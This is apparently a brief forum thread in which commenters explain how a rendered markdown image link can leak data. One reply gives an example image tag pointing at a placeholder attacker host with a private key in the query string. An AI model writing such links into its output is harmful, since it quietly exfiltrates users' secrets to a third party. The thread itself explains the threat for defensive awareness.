[oarsinsync]

> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?

[adamckay]

Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def

[eli]

Not hypothetical: https://checkmarx.com/zero-post/exploiting-markdown-injectio...